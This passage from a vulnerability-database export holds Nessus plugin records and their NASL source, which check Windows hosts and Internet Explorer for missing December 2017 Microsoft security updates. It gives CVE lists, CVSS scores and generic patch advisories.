multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4054522\nor cumulative update 4054519. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912,\n CVE-2017-11930)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. 
This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\");\n # https://support.microsoft.com/en-us/help/4054522/windows-81-update-kb4054522\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1020239a\");\n # https://support.microsoft.com/en-us/help/4054519/windows-81-update-kb4054519\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?18bd5547\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4054522 or Cumulative update KB4054519.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-12\";\nkbs = make_list('4054522', '4054519');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"12_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4054522, 4054519])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:41:32", "description": "The Internet Explorer installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. 
The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
(CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (December 2017)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11890", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11919", "CVE-2017-11930"], "modified": "2018-07-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_DEC_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/105188", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105188);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/07/30 15:31:34\");\n\n script_cve_id(\n \"CVE-2017-11886\",\n \"CVE-2017-11887\",\n \"CVE-2017-11890\",\n \"CVE-2017-11894\",\n \"CVE-2017-11895\",\n \"CVE-2017-11901\",\n \"CVE-2017-11903\",\n \"CVE-2017-11906\",\n \"CVE-2017-11907\",\n \"CVE-2017-11912\",\n \"CVE-2017-11913\",\n \"CVE-2017-11919\",\n \"CVE-2017-11930\"\n );\n script_bugtraq_id(\n 102045,\n 102046,\n 102047,\n 102053,\n 102054,\n 102058,\n 102062,\n 102063,\n 102078,\n 102082,\n 102091,\n 102092,\n 102093\n );\n\n script_xref(name:\"MSKB\", value:\"4054520\");\n script_xref(name:\"MSKB\", value:\"4052978\");\n script_xref(name:\"MSKB\", value:\"4054519\");\n script_xref(name:\"MSKB\", value:\"4054518\");\n script_xref(name:\"MSFT\", value:\"MS17-4054520\");\n script_xref(name:\"MSFT\", value:\"MS17-4052978\");\n script_xref(name:\"MSFT\", value:\"MS17-4054519\");\n script_xref(name:\"MSFT\", value:\"MS17-4054518\");\n\n script_name(english:\"Security Updates for Internet Explorer (December 2017)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912,\n CVE-2017-11930)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
(CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\");\n # https://support.microsoft.com/en-us/help/4054520/windows-server-2012-update-kb4054520\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?47a822ee\");\n # https://support.microsoft.com/en-us/help/4052978/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8a7a2b3\");\n # https://support.microsoft.com/en-us/help/4054519/windows-81-update-kb4054519\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?18bd5547\");\n # https://support.microsoft.com/en-us/help/4054518/windows-7-update-kb4054518\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?db8ca30f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB4054520\n -KB4052978\n -KB4054519\n -KB4054518\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-12';\nkbs = make_list(\n '4054518',\n '4054520',\n '4054519',\n '4052978'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.18860\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4052978\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22314\", min_version:\"10.0.9200.16000\", 
dir:\"\\system32\", bulletin:bulletin, kb:\"4052978\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.18860\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4052978\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21084\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4052978\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4052978 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4054519 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-12', kb:'4054519', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4054520 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-12', kb:'4054520', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4054518 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-12', kb:'4054518', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:40:56", "description": "The remote Windows host is missing security update 4054523 or cumulative update 4054520. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11912)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
(CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "Windows Server 2012 December 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11890", "CVE-2017-11894", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11927"], "modified": "2019-11-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_DEC_4054520.NASL", "href": "https://www.tenable.com/plugins/nessus/105186", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105186);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-11885\",\n \"CVE-2017-11886\",\n \"CVE-2017-11887\",\n \"CVE-2017-11890\",\n \"CVE-2017-11894\",\n \"CVE-2017-11901\",\n \"CVE-2017-11903\",\n \"CVE-2017-11906\",\n \"CVE-2017-11907\",\n \"CVE-2017-11912\",\n \"CVE-2017-11913\",\n \"CVE-2017-11927\"\n );\n script_bugtraq_id(\n 102045,\n 102046,\n 102047,\n 102053,\n 102055,\n 102062,\n 102063,\n 102078,\n 102082,\n 102091,\n 102092,\n 102095\n );\n script_xref(name:\"MSKB\", value:\"4054520\");\n script_xref(name:\"MSKB\", value:\"4054523\");\n script_xref(name:\"MSFT\", value:\"MS17-4054520\");\n script_xref(name:\"MSFT\", value:\"MS17-4054523\");\n\n script_name(english:\"Windows Server 2012 December 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4054523\nor cumulative update 4054520. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11912)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
(CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\");\n # https://support.microsoft.com/en-us/help/4054520/windows-server-2012-update-kb4054520\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?47a822ee\");\n # https://support.microsoft.com/en-us/help/4054523/windows-server-2012-update-kb4054523\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba2c078e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4054523 or Cumulative update KB4054520.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-12\";\nkbs = make_list('4054520', '4054523');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"12_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4054520, 4054523])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:40:55", "description": "The remote Windows host is missing multiple security updates released on 2017/12/12. It is, therefore, affected by multiple vulnerabilities :\n\n- An information vulnerability exists when Windows Media Player improperly discloses file information. 
Successful exploitation of the vulnerability could allow the attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11885) \n - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "Windows 2008 December 2017 Multiple Security Updates", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11768", "CVE-2017-11885", "CVE-2017-11927"], "modified": "2020-09-04T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], 
"id": "SMB_NT_MS17_DEC_WIN2008.NASL", "href": "https://www.tenable.com/plugins/nessus/105191", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105191);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\"CVE-2017-11768\", \"CVE-2017-11885\", \"CVE-2017-11927\");\n script_bugtraq_id(101705, 102055, 102095);\n script_xref(name:\"MSKB\", value:\"4047170\");\n script_xref(name:\"MSFT\", value:\"MS17-4047170\");\n script_xref(name:\"MSKB\", value:\"4052303\");\n script_xref(name:\"MSFT\", value:\"MS17-4052303\");\n script_xref(name:\"MSKB\", value:\"4053473\");\n script_xref(name:\"MSFT\", value:\"MS17-4053473\");\n\n script_name(english:\"Windows 2008 December 2017 Multiple Security Updates\");\n script_summary(english:\"Checks the existence of Windows Server 2008 December 2017 Patches.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing multiple security updates released\non 2017/12/12. It is, therefore, affected by multiple\nvulnerabilities :\n\n- An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. 
